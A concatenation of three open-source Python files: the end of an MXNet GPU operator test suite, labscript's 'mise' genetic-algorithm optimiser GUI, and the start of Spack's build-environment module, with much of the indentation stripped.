exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
                if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
                if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@unittest.skip('skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
if __name__ == '__main__':
import nose
nose.runmodule()
|
main.pyw
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program mise, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division
import os
import sys
import socket
import logging, logging.handlers
import Queue
import itertools
import subprocess
import threading
import urllib, urllib2
import numpy
import gtk, gobject
import zprocess.locking, labscript_utils.h5_lock, h5py
import labscript_utils.excepthook
from zprocess import ZMQServer, subprocess_with_queues, zmq_get
from labscript_utils.gtk_outputbox import OutputBox
from labscript_utils.labconfig import LabConfig, config_prefix
import labscript_utils.shared_drive
import runmanager
from mise import MiseParameter
# This provides debug info without having to run from a terminal, and
# avoids a stupid crash on Windows when there is no command window:
if not sys.stdout.isatty():
sys.stdout = sys.stderr = open('debug.log','w',1)
# Set a meaningful name for zprocess.locking's client id:
zprocess.locking.set_client_process_name('mise')
if os.name == 'nt':
# Make it not look so terrible (if icons and themes are installed):
gtk.settings_get_default().set_string_property('gtk-icon-theme-name','gnome-human','')
gtk.settings_get_default().set_string_property('gtk-theme-name','Clearlooks','')
gtk.settings_get_default().set_string_property('gtk-font-name','ubuntu 11','')
gtk.settings_get_default().set_long_property('gtk-button-images',False,'')
# Have Windows 7 consider this program to be a separate app, and not
# group it with other Python programs in the taskbar:
import ctypes
myappid = 'monashbec.labscript.mise' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
pass
def setup_logging():
logger = logging.getLogger('mise')
handler = logging.handlers.RotatingFileHandler(r'mise.log', maxBytes=1024*1024*50)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
        terminalhandler.setLevel(logging.DEBUG) # also show debug and higher in the terminal
logger.addHandler(terminalhandler)
logger.setLevel(logging.DEBUG)
return logger
logger = setup_logging()
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
class WebServer(ZMQServer):
"""A server to receive parameter spaces from runmanager, and fitness
reporting from lyse"""
def handler(self, request_data):
if request_data == 'hello':
# just a ping:
return 'hello'
elif isinstance(request_data,tuple) and len(request_data) > 1:
if request_data[0] == 'from runmanager':
# A parameter space from runmanager:
runmanager_data = request_data[1:]
with gtk.gdk.lock:
success, message = app.receive_parameter_space(runmanager_data)
return success, message
elif request_data[0] == 'from lyse':
# A fitness reported from lyse:
individual_id, fitness = request_data[1:]
with gtk.gdk.lock:
success, message = app.report_fitness(individual_id, fitness)
return success, message
success, message = False, 'Request to mise not understood\n'
return success, message
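# A minimal client-side sketch (illustrative only, not part of mise's public API) of
# how lyse would talk to the WebServer above via zprocess's zmq_get, mirroring the
# request formats handled in WebServer.handler. The port, host and function name here
# are assumptions for the example.
def _example_report_fitness_to_mise(port, host, individual_id, fitness):
    # The server replies with a (success, message) tuple for 'from lyse' requests:
    success, message = zmq_get(port, host, data=('from lyse', individual_id, fitness))
    return success, message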
class IndividualNotFound(Exception):
"""An exception class for when an operation on an individual fails
because the individual has been deleted in the meantime."""
pass
class Individual(object):
counter = itertools.count()
all_individuals = {}
def __init__(self, genome, mutation_biases, generation):
self.genome = genome
self.id = self.counter.next()
self.fitness_visible = False
self.fitness = None
self.compile_progress_visible = True
self.compile_progress = 0
self.error_visible = None
self.waiting_visible = False
self.all_individuals[self.id] = self
self.mutation_biases = mutation_biases
self.generation = generation
def __getitem__(self,item):
return self.genome[item]
class Generation(object):
counter = itertools.count()
all_generations = {}
def __init__(self, population, parameters, previous_generation=None):
self.id = self.counter.next()
self.all_generations[self.id] = self
self.individuals = []
if previous_generation is None:
# Spawn individuals to create the first generation:
for i in range(population):
genome = {}
for name, param in parameters.items():
if param.initial is None:
# Pick a random starting value within the range:
value = numpy.random.rand()*(param.max-param.min) + param.min
else:
# Pick a value by applying one generation's worth
# of mutation to the initial value:
value = numpy.random.normal(param.initial, param.mutation_rate)
value = numpy.clip(value, param.min, param.max)
genome[name] = value
mutation_biases = {name: numpy.sign(numpy.random.normal()) for name in genome}
individual = Individual(genome, mutation_biases, self)
self.individuals.append(individual)
else:
# Create a new generation from the previous one, by 'mating'
# pairs of individuals with each other with a probability
# based on their fitnesses. First, we normalize the
            # fitnesses of the previous generation to create a probability
# mass function:
fitnesses = numpy.array([individual.fitness for individual in previous_generation])
sorted_fitnesses = sorted(fitnesses)
rankings = [sorted_fitnesses.index(fitness) for fitness in fitnesses]
# Must be an array of floats if the inline +=,-=,/=,*= are to operate correctly
fitnesses = numpy.array(rankings,dtype=numpy.float)
fitnesses -= fitnesses.min()
if fitnesses.max() != 0:
fitnesses /= fitnesses.max()
# Add an offset to ensure that the least fit individual
# will still have a nonzero probability of reproduction;
# approx 1/N times the most fit individual's probability:
fitnesses += 1/len(fitnesses)
fitnesses /= fitnesses.sum()
# Let mating season begin:
while len(self.individuals) < population:
# Pick parent number #1
parent_1_index = numpy.searchsorted(numpy.cumsum(fitnesses), numpy.random.rand())
# Pick parent number #2, must be different to parent #1:
parent_2_index = parent_1_index
while parent_2_index == parent_1_index:
parent_2_index = numpy.searchsorted(numpy.cumsum(fitnesses), numpy.random.rand())
parent_1 = previous_generation[parent_1_index]
parent_2 = previous_generation[parent_2_index]
# Now we have two parents. Let's mix their genomes:
child_genome = {}
child_mutation_biases = {}
for name, param in parameters.items():
# Pick a point in parameter space from a uniform
# probability distribution along the line spanned
# by the two parents:
crossover_parameter = numpy.random.rand()
# The child will inherit mutation biases from
# whichever parent it is closest to in parameter
# space:
closest_parent = (parent_1,parent_2)[int(round(crossover_parameter))]
if name in parent_1.genome and name in parent_2.genome:
lim1, lim2 = parent_1[name], parent_2[name]
child_value = crossover_parameter*(lim2-lim1) + lim1
# Pick a mutation biasing direction from one of the parents:
mutation_bias = closest_parent.mutation_biases[name]
# Possibly mutate this direction, with probability 1/population:
if numpy.random.rand() < 1/population:
mutation_bias *= -1
child_mutation_biases[name] = mutation_bias
# Apply a Gaussian mutation and clip to keep in limits:
child_value = numpy.random.normal(child_value, param.mutation_rate)
mutation_value = abs(numpy.random.normal(0, param.mutation_rate))*mutation_bias
child_value += mutation_value
child_value = numpy.clip(child_value, param.min, param.max)
else:
                        # The parents don't have this parameter; the
                        # parameter set must have changed, so we need
                        # an initial value for it:
if param.initial is None:
# Pick a random starting value within the range:
child_value = numpy.random.rand()*(param.max-param.min) + param.min
else:
# Pick a value by applying one generation's worth
# of mutation to the initial value:
child_value = numpy.random.normal(param.initial, param.mutation_rate)
                        child_value = numpy.clip(child_value, param.min, param.max)
# Pick a random mutation biasing direction:
child_mutation_biases[name] = numpy.sign(numpy.random.normal())
child_genome[name] = child_value
# Congratulations, it's a boy!
child = Individual(child_genome, child_mutation_biases, self)
self.individuals.append(child)
def __iter__(self):
return iter(self.individuals)
def __getitem__(self, index):
return self.individuals[index]
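# A standalone sketch of the rank-based selection performed in Generation.__init__
# (illustrative only; these helpers are not used by the classes above): fitnesses are
# replaced by their ranks, rescaled into a probability mass function with roughly a
# 1/N floor so the least fit individual can still reproduce, and parents are drawn by
# inverse-CDF sampling over the cumulative sum.
def _example_selection_probabilities(raw_fitnesses):
    fitnesses = numpy.array(raw_fitnesses, dtype=float)
    sorted_fitnesses = sorted(fitnesses)
    ranks = numpy.array([sorted_fitnesses.index(f) for f in fitnesses], dtype=float)
    ranks -= ranks.min()
    if ranks.max() != 0:
        ranks /= ranks.max()
    ranks += 1.0 / len(ranks)
    return ranks / ranks.sum()
def _example_pick_parent_index(probabilities):
    # Inverse-CDF sampling: a uniform random number indexes into the cumulative sum.
    return numpy.searchsorted(numpy.cumsum(probabilities), numpy.random.rand())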
# Some convenient constants for accessing liststore columns:
# Individual list store:
GENERATION = 0
ID = 1
FITNESS_VISIBLE = 2
FITNESS = 3
COMPILE_PROGRESS_VISIBLE = 4
COMPILE_PROGRESS = 5
ERROR_VISIBLE = 6
WAITING_VISIBLE = 7
# Parameter liststore:
NAME = 0
MIN = 1
MAX = 2
MUTATION_RATE = 3
LOG = 4
class Mise(object):
base_liststore_cols = ['generation',
'id',
'fitness_visible',
'fitness',
'compile_progress_visible',
'compile_progress',
'error_visible',
'waiting_visible']
base_liststore_types = {'generation': str,
'id': str,
'fitness_visible': bool,
'fitness': str,
'compile_progress_visible': bool,
'compile_progress': int,
'error_visible': bool,
'waiting_visible': bool}
def __init__(self):
# Make a gtk Builder with the user interface file:
builder = gtk.Builder()
builder.add_from_file('main.glade')
# Get required objects from the builder:
outputbox_container = builder.get_object('outputbox_container')
self.window = builder.get_object('window')
self.liststore_parameters = builder.get_object('liststore_parameters')
self.treeview_individuals = builder.get_object('treeview_individuals')
self.pause_button = builder.get_object('pause_button')
self.box_paused = builder.get_object('paused')
self.box_not_paused = builder.get_object('not_paused')
self.label_labscript_file = builder.get_object('label_labscript_file')
self.label_output_directory = builder.get_object('label_output_directory')
self.spinbutton_population = builder.get_object('spinbutton_population')
scrolledwindow_individuals = builder.get_object('scrolledwindow_individuals')
self.adjustment_treeview_individuals = scrolledwindow_individuals.get_vadjustment()
# Allow you to select multiple entries in the treeview:
self.treeselection_individuals = self.treeview_individuals.get_selection()
self.treeselection_individuals.set_mode(gtk.SELECTION_MULTIPLE)
# Connect signals:
builder.connect_signals(self)
# Show the main window:
self.window.show()
# Make an output box for terminal output. Compilations will have their output streams
# redirected to it over zmq sockets:
self.outputbox = OutputBox(outputbox_container)
# Get settings:
config_path = os.path.join(config_prefix,'%s.ini'%socket.gethostname())
required_config_params = {"paths":["experiment_shot_storage"],'ports':['mise']}
self.config = LabConfig(config_path,required_config_params)
# Start the web server:
port = self.config.get('ports','mise')
logger.info('starting web server on port %s'%port)
self.server = WebServer(port)
# A condition to let the looping threads know when to recheck conditions
# they're waiting on (instead of having them do time.sleep)
self.timing_condition = threading.Condition()
self.params = {}
self.labscript_file = None
self.population = int(self.spinbutton_population.get_value())
self.current_generation = None
self.generations = []
self.treeview_parameter_columns = []
self.new_individual_liststore()
# Start the compiler subprocess:
runmanager_dir=os.path.dirname(runmanager.__file__)
batch_compiler = os.path.join(runmanager_dir, 'batch_compiler.py')
self.to_child, self.from_child, child = subprocess_with_queues(batch_compiler,self.outputbox.port)
self.paused = False
# Whether the last scroll to the bottom of the individuals treeview has been processed:
self.scrolled = True
# A thread which looks for un-compiled individuals and compiles
# them, submitting them to BLACS:
self.compile_thread = threading.Thread(target=self.compile_loop)
self.compile_thread.daemon = True
self.compile_thread.start()
# A thread which looks for when all fitnesses have come back,
# and spawns a new generation when they have:
self.reproduction_thread = threading.Thread(target=self.reproduction_loop)
self.reproduction_thread.daemon = True
self.reproduction_thread.start()
logger.info('init done')
def destroy(self, widget):
logger.info('destroy')
gtk.main_quit()
def error_dialog(self, message):
dialog = gtk.MessageDialog(self.window, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_WARNING,
buttons=(gtk.BUTTONS_OK), message_format = message)
result = dialog.run()
dialog.destroy()
def scroll_to_bottom(self):
with gtk.gdk.lock:
self.adjustment_treeview_individuals.set_value(
self.adjustment_treeview_individuals.upper - self.adjustment_treeview_individuals.page_size)
self.scrolled = True
def on_pause_button_toggled(self,button):
if button.get_active():
self.paused = True
self.box_paused.show()
self.box_not_paused.hide()
else:
self.paused = False
self.box_paused.hide()
self.box_not_paused.show()
with self.timing_condition:
self.timing_condition.notify_all()
def on_spinbutton_population_value_changed(self, widget):
self.population = int(self.spinbutton_population.get_value())
print self.population
def on_parameter_min_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
if value >= param.max:
self.error_dialog('Must have min < max.')
return
param.min = value
row[MIN] = value
def on_parameter_max_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
if value <= param.min:
self.error_dialog('Must have max > min.')
return
param.max = value
row[MAX] = value
def on_parameter_mutationrate_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
param.mutation_rate = value
row[MUTATION_RATE] = value
def on_parameter_logarithmic_toggled(self, renderer, rowindex):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
param.log = not param.log
row[LOG] = param.log
def receive_parameter_space(self, runmanager_data):
"""Receive a parameter space dictionary from runmanger"""
(labscript_file, sequenceglobals, shots,
output_folder, shuffle, BLACS_server, BLACS_port, shared_drive_prefix) = runmanager_data
self.params = {}
self.liststore_parameters.clear()
# Pull out the MiseParameters:
first_shot = shots[0]
for name, value in first_shot.items():
if isinstance(value, MiseParameter):
data = [name, value.min, value.max, value.mutation_rate]
self.liststore_parameters.append(data)
self.params[name] = value
self.new_individual_liststore()
if self.current_generation is None:
self.new_generation()
self.labscript_file = labscript_file
self.sequenceglobals = sequenceglobals
self.shots = shots
self.output_folder = output_folder
self.shuffle = shuffle
self.BLACS_server = BLACS_server
self.BLACS_port = BLACS_port
self.shared_drive_prefix = shared_drive_prefix
self.label_labscript_file.set_text(self.labscript_file)
self.label_output_directory.set_text(self.output_folder)
# Let waiting threads know that there might be new state for them to check:
with self.timing_condition:
self.timing_condition.notify_all()
return True, 'optimisation request added successfully\n'
def report_fitness(self, individual_id, fitness):
found = False
if self.current_generation is None:
return False, 'mise is not initialised, there are no individuals requiring fitness reports.'
for individual in self.current_generation:
if individual.id == individual_id:
found = True
break
if not found:
return False, 'individual with id %d not found in current generation'%individual_id
individual.fitness = fitness
self.set_value(individual, FITNESS, fitness)
individual.fitness_visible = True
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
        # The reproduction_loop will want to check whether it's time for a new generation:
with self.timing_condition:
self.timing_condition.notify_all()
return True, None
def append_generation_to_liststore(self, generation):
for individual in generation:
row = [generation.id,
individual.id,
individual.fitness_visible,
individual.fitness,
individual.compile_progress_visible,
individual.compile_progress,
individual.error_visible,
individual.waiting_visible]
row += [individual[name] for name in self.params]
self.liststore_individuals.append(row)
def new_individual_liststore(self):
column_names = self.base_liststore_cols + self.params.keys()
column_types = [self.base_liststore_types[name] for name in self.base_liststore_cols] + [str for name in self.params]
self.liststore_individuals = gtk.ListStore(*column_types)
self.treeview_individuals.set_model(self.liststore_individuals)
for generation in self.generations:
self.append_generation_to_liststore(generation)
# Make sure the Treeview has columns for the current parameters:
for param_name in self.params:
if not param_name in self.treeview_parameter_columns:
self.treeview_parameter_columns.append(param_name)
model_column_index = column_names.index(param_name)
renderer = gtk.CellRendererText()
widget = gtk.HBox()
heading = gtk.Label(param_name)
heading.show()
column = gtk.TreeViewColumn()
column.pack_start(renderer)
column.set_widget(heading)
column.add_attribute(renderer, 'text', model_column_index)
column.set_resizable(True)
column.set_reorderable(True)
self.treeview_individuals.append_column(column)
def set_value(self, individual, column, value):
"""Searches the liststore for the individual, setting the
value of a particular column in the individual's row. Raises
IndividualNotFound if the row is not found. You must acquire
the gtk lock before calling this method."""
for row in self.liststore_individuals:
if int(row[ID]) == individual.id:
row[column] = value
return
raise IndividualNotFound
def on_button_delete_individuals_clicked(self, button):
model, selection = self.treeselection_individuals.get_selected_rows()
# Have to delete one at a time, since the indices change after
# each deletion:
while selection:
path = selection[0]
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
# Delete the individual's entry from the liststore:
model.remove(iter)
# Get the individual itself:
individual = Individual.all_individuals[individual_id]
# Delete it from the record of all individuals:
del Individual.all_individuals[individual_id]
# Delete it from its parent generation's record of individuals:
generation = individual.generation
generation.individuals.remove(individual)
# Update selection now that deletion of this individual is complete:
selection = self.treeview_individuals.get_selection()
model, selection = selection.get_selected_rows()
def on_button_mark_uncompiled_clicked(self,button):
model, selection = self.treeselection_individuals.get_selected_rows()
for path in selection:
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
individual = Individual.all_individuals[individual_id]
if individual.compile_progress == 100:
individual.compile_progress = 0
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
individual.compile_progress_visible = True
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.error_visible = False
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
individual.fitness = None
self.set_value(individual, FITNESS, individual.fitness)
individual.fitness_visible = False
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
with self.timing_condition:
self.timing_condition.notify_all()
def on_button_clear_fitness_clicked(self,button):
model, selection = self.treeselection_individuals.get_selected_rows()
for path in selection:
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
individual = Individual.all_individuals[individual_id]
if individual.fitness is not None:
individual.waiting_visible = True
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
individual.fitness = None
self.set_value(individual, FITNESS, individual.fitness)
individual.fitness_visible = False
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
def compile_one_individual(self,individual):
# Create a list of shot globals for this individual, by copying
# self.shots and replacing MiseParameters with their values for
# this individual:
shots = []
for shot in self.shots:
this_shot = shot.copy()
for param_name in individual.genome:
this_shot[param_name] = individual[param_name]
shots.append(this_shot)
# Create run files:
sequence_id = runmanager.generate_sequence_id(self.labscript_file) + '_g%di%d'%(self.current_generation.id, individual.id)
n_run_files = len(shots)
try:
run_files = runmanager.make_run_files(self.output_folder, self.sequenceglobals, shots, sequence_id, self.shuffle)
with gtk.gdk.lock:
individual.error_visible = False
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
for i, run_file in enumerate(run_files):
with h5py.File(run_file) as hdf5_file:
hdf5_file.attrs['individual id'] = individual.id
hdf5_file.attrs['generation'] = self.current_generation.id
self.to_child.put(['compile',[self.labscript_file,run_file]])
while True:
signal,data = self.from_child.get()
if signal == 'done':
success = data
break
else:
raise RuntimeError((signal, data))
if not success:
raise Exception
else:
with gtk.gdk.lock:
individual.compile_progress = 100*float(i+1)/n_run_files
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
if individual.compile_progress == 100:
individual.compile_progress_visible = False
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.waiting_visible = True
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
self.submit_job(run_file)
except IndividualNotFound:
            # The Individual has been deleted at some point. It's gone,
# so we don't have to worry about where we were up to with
# anything. It will be garbage collected....now:
return
        except Exception as e:
# Couldn't make or run files, couldn't compile, or couldn't
# submit. Print the error, pause mise, and display error icon:
self.outputbox.output(str(e) + '\n', red = True)
with gtk.gdk.lock:
self.pause_button.set_active(True)
individual.compile_progress = 0
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
individual.compile_progress_visible = False
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.error_visible = True
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
def submit_job(self, run_file):
# Workaround to force python not to use IPv6 for the request:
host = socket.gethostbyname(self.BLACS_server)
agnostic_path = labscript_utils.shared_drive.path_to_agnostic(run_file)
self.outputbox.output('Submitting run file %s.\n'%os.path.basename(run_file))
try:
response = zmq_get(self.BLACS_port, host, data=agnostic_path)
if 'added successfully' in response:
self.outputbox.output(response)
else:
raise Exception(response)
except Exception as e:
self.outputbox.output('Couldn\'t submit job to control server: %s\n'%str(e),red=True)
raise
def compile_loop(self):
while True:
with self.timing_condition:
while self.paused or self.current_generation is None:
self.timing_condition.wait()
logger.info('compile loop iteration')
# Get the next individual requiring compilation:
compile_required = False
for individual in self.current_generation:
if individual.compile_progress == 0:
logger.info('individual %d needs compiling'%individual.id)
compile_required = True
break
# If we didn't find any individuals requiring compilation,
# wait until a timing_condition notification before checking
# again:
if not compile_required:
logger.info('no individuals requiring compilation')
self.timing_condition.wait()
continue
# OK, we have an individual which requires compilation.
self.compile_one_individual(individual)
def reproduction_loop(self):
while True:
while self.paused or self.current_generation is None:
with self.timing_condition:
self.timing_condition.wait()
logger.info('reproduction loop iteration')
if not all([individual.fitness is not None for individual in self.current_generation]):
# Still waiting on at least one individual, do not spawn a new generation yet
with self.timing_condition:
self.timing_condition.wait()
continue
# OK, all fitnesses are reported. Mating season is upon us:
with gtk.gdk.lock:
self.new_generation()
def new_generation(self):
self.current_generation = Generation(self.population, self.params, self.current_generation)
self.generations.append(self.current_generation)
self.append_generation_to_liststore(self.current_generation)
if self.scrolled:
# Are we scrolled to the bottom of the TreeView?
if self.adjustment_treeview_individuals.value == self.adjustment_treeview_individuals.upper - self.adjustment_treeview_individuals.page_size:
self.scrolled = False
gobject.idle_add(self.scroll_to_bottom)
# There are new individuals, the compile_loop will want to know about this:
with self.timing_condition:
self.timing_condition.notify_all()
if __name__ == '__main__':
gtk.threads_init()
app = Mise()
with gtk.gdk.lock:
gtk.main()
|
build_environment.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
import spack.architecture as arch
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
